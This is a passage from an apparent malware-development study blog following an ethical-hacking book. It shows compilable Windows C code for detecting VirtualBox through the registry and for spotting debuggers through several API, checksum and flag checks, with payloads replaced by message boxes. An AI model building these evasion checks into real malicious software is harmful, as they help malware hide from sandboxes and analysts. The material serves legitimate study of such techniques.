on the dot, but was still marked as a virtual machine. Setting it to 1000 ms &gt; time &lt; 1000ms tightens the execution to perfect. The VM runs at 1031ms. I'm curious if a slower or much older computer would end up triggering as a VM as well.</p> <h1 id="registry-detection">Registry Detection</h1> <p>This example checks for the existence of registry keys and checks if the value equals something in particular. This is what I was referring to earlier in Hardware Detection, we are able to check for System Product Name or BiosVersion to detect VirtualBox. I removed the payload from my example and defaulted back to simple message boxes again.</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Anti-VM - Registry Detect</span> <span class="cm"> 15 Feb 2025</span> <span class="cm"> Eric</span> <span class="cm"> x86_64-w64-mingw32-g++ -O2 06_registry.c -o VMRegistry.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdlib.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;string.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="kt">int</span><span class="w"> </span><span class="nf">checkRegistryKey</span><span class="p">(</span><span class="n">HKEY</span><span class="w"> </span><span class="n">rootKey</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">subKeyName</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">HKEY</span><span class="w"> </span><span class="n">registryKey</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span> <span class="w"> </span><span class="n">LONG</span><span class="w"> </span><span class="n">result</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RegOpenKeyExA</span><span class="p">(</span><span class="n">rootKey</span><span class="p">,</span><span class="w"> </span><span class="n">subKeyName</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">KEY_READ</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">registryKey</span><span class="p">);</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">result</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">ERROR_SUCCESS</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">RegCloseKey</span><span class="p">(</span><span class="n">registryKey</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">TRUE</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span> <span class="p">}</span> <span class="kt">int</span><span class="w"> </span><span class="nf">compareRegistryKeyValue</span><span class="p">(</span><span class="n">HKEY</span><span class="w"> </span><span class="n">rootKey</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">subKeyName</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">registryValue</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">comparisonValue</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">HKEY</span><span class="w"> </span><span class="n">registryKey</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span> <span class="w"> </span><span class="n">LONG</span><span class="w"> </span><span class="n">result</span><span class="p">;</span> <span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">value</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">size</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">value</span><span class="p">);</span> <span class="w"> </span><span class="n">result</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RegOpenKeyExA</span><span class="p">(</span><span class="n">rootKey</span><span class="p">,</span><span class="w"> </span><span class="n">subKeyName</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">KEY_READ</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">registryKey</span><span class="p">);</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">result</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">ERROR_SUCCESS</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">RegQueryValueExA</span><span class="p">(</span><span class="n">registryKey</span><span class="p">,</span><span class="w"> </span><span class="n">registryValue</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">LPBYTE</span><span class="p">)</span><span class="n">value</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">size</span><span class="p">);</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">result</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">ERROR_SUCCESS</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">value</span><span class="p">,</span><span class="w"> </span><span class="n">comparisonValue</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">TRUE</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span> <span class="p">}</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">argv</span><span class="p">[])</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">processHandle</span><span class="p">;</span><span class="w"> </span><span class="c1">// Process handle</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">remoteThread</span><span class="p">;</span><span class="w"> </span><span class="c1">// Remote thread</span> <span class="w"> </span><span class="n">PVOID</span><span class="w"> </span><span class="n">remoteBuffer</span><span class="p">;</span><span class="w"> </span><span class="c1">// Remote buffer</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">checkRegistryKey</span><span class="p">(</span><span class="n">HKEY_LOCAL_MACHINE</span><span class="p">,</span><span class="w"> </span><span class="s">"HARDWARE</span><span class="se">\\</span><span class="s">ACPI</span><span class="se">\\</span><span class="s">FADT</span><span class="se">\\</span><span class="s">VBOX__"</span><span class="p">))</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"VirtualBox VM registry path value detected</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="s">"Virtual Machine Detected"</span><span class="p">,</span><span class="w"> </span><span class="s">"Program"</span><span class="p">,</span><span class="w"> </span><span class="n">MB_OK</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">-2</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">compareRegistryKeyValue</span><span class="p">(</span><span class="n">HKEY_LOCAL_MACHINE</span><span class="p">,</span><span class="w"> </span><span class="s">"SYSTEM</span><span class="se">\\</span><span class="s">CurrentControlSet</span><span class="se">\\</span><span class="s">Control</span><span class="se">\\</span><span class="s">SystemInformation"</span><span class="p">,</span> <span class="w"> </span><span class="s">"SystemProductName"</span><span class="p">,</span><span class="w"> </span><span class="s">"VirtualBox"</span><span class="p">))</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"VirtualBox VM registry key value detected</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="s">"Virtual Machine Detected"</span><span class="p">,</span><span class="w"> </span><span class="s">"Program"</span><span class="p">,</span><span class="w"> </span><span class="n">MB_OK</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">-2</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">compareRegistryKeyValue</span><span class="p">(</span><span class="n">HKEY_LOCAL_MACHINE</span><span class="p">,</span><span class="w"> </span><span class="s">"SYSTEM</span><span class="se">\\</span><span class="s">CurrentControlSet</span><span class="se">\\</span><span class="s">Control</span><span class="se">\\</span><span class="s">SystemInformation"</span><span class="p">,</span> <span class="w"> </span><span class="s">"BiosVersion"</span><span class="p">,</span><span class="w"> </span><span class="s">"VirtualBox"</span><span class="p">))</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"VirtualBox VM BIOS version detected</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="s">"Virtual Machine Detected"</span><span class="p">,</span><span class="w"> </span><span class="s">"Program"</span><span class="p">,</span><span class="w"> </span><span class="n">MB_OK</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">-2</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="s">"Running Hack"</span><span class="p">,</span><span class="w"> </span><span class="s">"Program"</span><span class="p">,</span><span class="w"> </span><span class="n">MB_OK</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <h1 id="conclusion">Conclusion</h1> <p>There were some interesting techniques for virtual machine detection. Most of these seemed very rudimentary to be able to evade. I am curious what detections could be used that aren't as easy to defeat but still promote high accuracy.</p>2025-01-29T02:57:57-05:002025-01-29T02:57:57-05:00Eric Turnertag:blog.ericturner.it,2025-01-29:/2025/01/29/malware-dev-chapter-05-anti-debugging-tricks/

<p>Continued series from the&nbsp;<a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers Book</a>.<br/> GitHub repo:&nbsp;<a href="https://github.com/EricTurner3/cybersecurity/tree/main/Malware_Development">EricTurner3 &ndash; Malware_Development</a>.</p> <h1 id="detecting-debugger">Detecting Debugger</h1> <h2 id="isdebuggerpresent">IsDebuggerPresent()</h2> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Anti-Debugging - Check for Debugger</span> <span class="cm"> 28 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-gcc 05_debugger_present.c -o DebugCheck.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdlib.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h …</span></code></pre></div>

<p>Continued series from the&nbsp;<a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers Book</a>.<br/> GitHub repo:&nbsp;<a href="https://github.com/EricTurner3/cybersecurity/tree/main/Malware_Development">EricTurner3 &ndash; Malware_Development</a>.</p> <h1 id="detecting-debugger">Detecting Debugger</h1> <h2 id="isdebuggerpresent">IsDebuggerPresent()</h2> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Anti-Debugging - Check for Debugger</span> <span class="cm"> 28 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-gcc 05_debugger_present.c -o DebugCheck.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdlib.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="c1">// Check if a debugger is present</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">IsDebuggerPresent</span><span class="p">())</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="s">"New Message"</span><span class="p">,</span><span class="w"> </span><span class="s">"Nothing to see here"</span><span class="p">,</span><span class="w"> </span><span class="n">MB_OK</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"> </span><span class="c1">// exit if a debugger is present</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="s">"Hack"</span><span class="p">,</span><span class="w"> </span><span class="s">"Hacking mainframe..."</span><span class="p">,</span><span class="w"> </span><span class="n">MB_OK</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-57.webp"/></p> <p>comparison of running the exe directly vs running in a debugger</p> <p>Sample code using the <code>IsDebuggerPresent()</code> check. I simplified my version over what was in the book. It is also important to note that I ahve plugins in my x64dbg, including ScyllaHide. ScyllaHide has a bunch of options to fake the flags for debug checks to prevent the application from truly telling if it is being debugged. I had to disable all options for it to properly work: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-58.webp"/></p> <h2 id="checkremotedebuggerpresent">CheckRemoteDebuggerPresent()</h2> <p>A slight modification to the debug check script to use<code>CheckRemoteDebuggerPresent</code> API call instead for detecting a debugger:</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Anti-Debugging - Check for RemoteDebugger</span> <span class="cm"> 28 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-gcc 05_debugger_present_remote.c -o RemoteDebugCheck.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdlib.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">HasDebugPort</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span> <span class="w"> </span><span class="c1">// Check if a debugger is present</span> <span class="w"> </span><span class="c1">// https://unprotect.it/technique/checkremotedebuggerpresent/</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">CheckRemoteDebuggerPresent</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span><span class="w"> </span><span class="o">&amp;</span><span class="n">HasDebugPort</span><span class="p">))</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="s">"New Message"</span><span class="p">,</span><span class="w"> </span><span class="s">"Nothing to see here"</span><span class="p">,</span><span class="w"> </span><span class="n">MB_OK</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"> </span><span class="c1">// exit if a debugger is present</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="s">"Hack"</span><span class="p">,</span><span class="w"> </span><span class="s">"Hacking mainframe..."</span><span class="p">,</span><span class="w"> </span><span class="n">MB_OK</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <h1 id="breakpoint-checksum_1">Breakpoint Checksum</h1> <p>This use case did not make a lot of sense to me purely going off of the information provided in the book. It turns out that this code appears to be copied from elsewhere. Here is the <a href="https://unprotect.it/technique/performing-code-checksum/">same example on Unprotect.it</a>, which links back to the <a href="https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software#p6">original article from Apriorit</a>.</p> <p>Essentially, set up our important function that should have integrity and use a stub function to determine the end of that function. We then compile and execute the program to determine the original CRC of our function. Hardcode this value into the source code so that if the code is modified via debugging or a breakpoint, it will fail the checksum and can terminate or escape the main logic.</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Anti-Debugging - Breakpoint Detection / Checksum</span> <span class="cm"> 28 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-g++ -O2 05_func_checksum.c -o Breakpoint.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -lpsapi </span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="n">DWORD</span><span class="w"> </span><span class="nf">CalcFuncCrc</span><span class="p">(</span><span class="n">PUCHAR</span><span class="w"> </span><span class="n">funcBegin</span><span class="p">,</span><span class="w"> </span><span class="n">PUCHAR</span><span class="w"> </span><span class="n">funcEnd</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">crc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(;</span><span class="w"> </span><span class="n">funcBegin</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="n">funcEnd</span><span class="p">;</span><span class="w"> </span><span class="o">++</span><span class="n">funcBegin</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">crc</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="o">*</span><span class="n">funcBegin</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">crc</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// prevent compiler from making functions embedded</span> <span class="cp">#pragma auto_inline(off)</span> <span class="n">VOID</span><span class="w"> </span><span class="nf">DebuggeeFunction</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Hello World"</span><span class="p">);</span> <span class="p">}</span> <span class="n">VOID</span><span class="w"> </span><span class="nf">DebuggeeFunctionEnd</span><span class="p">()</span><span class="w"> </span><span class="p">{};</span><span class="w"> </span><span class="c1">// stub function trick to detect end of our func we are calculating crc of</span> <span class="cp">#pragma auto_inline(on)</span> <span class="c1">// to calculate this value, the program needs compiled and executed</span> <span class="c1">// monitor the output of the crc in the console, and update the value here</span> <span class="c1">// thus, if the code is modified in anyway</span> <span class="c1">// then the crc no longer will match and it will flag</span> <span class="c1">// one example is a breakpoint, which injects an int 3h / 0xCC opcode into the function</span> <span class="c1">// this would destroy the integrity of the checksum</span> <span class="n">DWORD</span><span class="w"> </span><span class="n">g_origCrc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mh">0x4db</span><span class="p">;</span><span class="w"> </span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">crc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CalcFuncCrc</span><span class="p">((</span><span class="n">PUCHAR</span><span class="p">)</span><span class="n">DebuggeeFunction</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">PUCHAR</span><span class="p">)</span><span class="n">DebuggeeFunctionEnd</span><span class="p">);</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"crc: 0x%x (%ld)"</span><span class="p">,</span><span class="w"> </span><span class="n">crc</span><span class="p">,</span><span class="w"> </span><span class="n">crc</span><span class="p">);</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">g_origCrc</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">crc</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="s">"Breakpoint detected"</span><span class="p">,</span><span class="w"> </span><span class="s">"Debug Check"</span><span class="p">,</span><span class="w"> </span><span class="n">MB_OK</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">-1</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="s">"Running as usual"</span><span class="p">,</span><span class="w"> </span><span class="s">"Debug Check"</span><span class="p">,</span><span class="w"> </span><span class="n">MB_OK</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <p>I added my own printf statement into this to illustrate where the CRC comes from, as my CRC is different than the one from the book and the original author. Once this value is displayed, I can add it back to the code to re-compile and now my check shows running as usual.</p> <p>In order to trigger the breakpoint check, we need to find the actual DebuggeeFunction and place a breakpoint exactly inside of this. I found the original code to be too tricky to find the breakpoint, so I modified it to print a string, and was able to easily find the string reference to place a breakpoint. Now we can see the comparison of running it directly, vs the debugger with the breakpoint: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-60.webp"/></p> <p>normal operation vs breakpoint</p> <h1 id="flags-artifacts">Flags &amp; Artifacts</h1> <h2 id="ntglobalflag">NTGlobalFlag</h2> <p>NTGlobalFlag is part of the Process Environment Block. If a debugger is the parent process, additional flags are set, vs if the debugger is attached later on.</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Anti-Debugging - Check NTGlobalFlag</span> <span class="cm"> 28 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-gcc 05_flag_ntglobal.c -o ntglobal_flag.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;winternl.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;intrin.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="cp">#define FLG_HEAP_ENABLE_TAIL_CHECK 0x10</span> <span class="cp">#define FLG_HEAP_ENABLE_FREE_CHECK 0x20</span> <span class="cp">#define FLG_HEAP_VALIDATE_PARAMETERS 0x40</span> <span class="cp">#define NT_GLOBAL_FLAG_DEBUGGED (FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS)</span> <span class="n">DWORD</span><span class="w"> </span><span class="nf">checkNtGlobalFlag</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">PPEB</span><span class="w"> </span><span class="n">ppeb</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PPEB</span><span class="p">)</span><span class="n">__readgsqword</span><span class="p">(</span><span class="mh">0x60</span><span class="p">);</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">myNtGlobalFlag</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="p">(</span><span class="n">PDWORD</span><span class="p">)((</span><span class="n">PBYTE</span><span class="p">)</span><span class="n">ppeb</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mh">0xBC</span><span class="p">);</span> <span class="w"> </span><span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">myNtGlobalFlag</span><span class="w"> </span><span class="o">&amp;</span><span class="w"> </span><span class="n">NT_GLOBAL_FLAG_DEBUGGED</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"Debugger Active"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"Debugger Inactive"</span><span class="p">,</span><span class="w"> </span><span class="s">"Debug Check"</span><span class="p">,</span><span class="w"> </span><span class="n">MB_OK</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">argv</span><span class="p">[])</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">check</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">checkNtGlobalFlag</span><span class="p">();</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <p>Compiling the code and executing provides the following two scenarios:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-61.webp"/></p> <p>inactive / active debugger status</p> <h2 id="process-debug-flags">Process Debug Flags</h2> <p>There is an undocumented class named <code>ProcessDebugFlags</code> that when passed to the NtQueryInformationProcess function, returns information on if a debugger is present. See another example <a href="https://anti-debug.checkpoint.com/techniques/debug-flags.html#using-win32-api-ntqueryinformationprocess-processdebugflags">here</a>.</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Anti-Debugging - Check NTQuery ProcessDebugFlag</span> <span class="cm"> 28 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-gcc 05_flag_ntquery.c -o ntquery_flag.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdlib.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdbool.h&gt;</span> <span class="k">typedef</span><span class="w"> </span><span class="n">NTSTATUS</span><span class="p">(</span><span class="n">NTAPI</span><span class="w"> </span><span class="o">*</span><span class="n">fNtQueryInformationProcess</span><span class="p">)(</span> <span class="w"> </span><span class="n">IN</span><span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">ProcessHandle</span><span class="p">,</span> <span class="w"> </span><span class="n">IN</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">ProcessInformationClass</span><span class="p">,</span> <span class="w"> </span><span class="n">OUT</span><span class="w"> </span><span class="n">PVOID</span><span class="w"> </span><span class="n">ProcessInformation</span><span class="p">,</span> <span class="w"> </span><span class="n">IN</span><span class="w"> </span><span class="n">ULONG</span><span class="w"> </span><span class="n">ProcessInformationLength</span><span class="p">,</span> <span class="w"> </span><span class="n">OUT</span><span class="w"> </span><span class="n">PULONG</span><span class="w"> </span><span class="n">ReturnLength</span> <span class="p">);</span> <span class="c1">// Function to check if a debugger is present</span> <span class="kt">bool</span><span class="w"> </span><span class="nf">DebuggerCheck</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">result</span><span class="p">;</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">rProcDebugFlags</span><span class="p">;</span> <span class="w"> </span><span 